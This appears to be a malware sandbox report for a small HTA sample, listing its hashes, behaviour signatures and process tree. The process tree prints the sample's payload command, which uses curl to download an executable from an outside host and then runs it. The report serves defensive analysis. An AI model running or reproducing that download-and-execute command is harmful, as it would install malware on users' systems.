Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09/06/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d.hta
Resource
win10v2004-20240426-en
General
-
Target
d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d.hta
-
Size
173B
-
MD5
81d631fdb7e6f1d8b2222355bdea0d92
-
SHA1
fc5a81c0b9df522b041caf2557f152514ccfcd5c
-
SHA256
d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d
-
SHA512
1baab86587eeef814752265b1d340e41f0063b19621e184cdc2a8fb7b7471587b35f00cace53e24ebd1d2bbb287836cd24eb6fa04863332e486a5dce3d1023ec
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 856 wrote to memory of 3012 856 mshta.exe 28 PID 856 wrote to memory of 3012 856 mshta.exe 28 PID 856 wrote to memory of 3012 856 mshta.exe 28 PID 856 wrote to memory of 3012 856 mshta.exe 28
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe2⤵PID:3012
-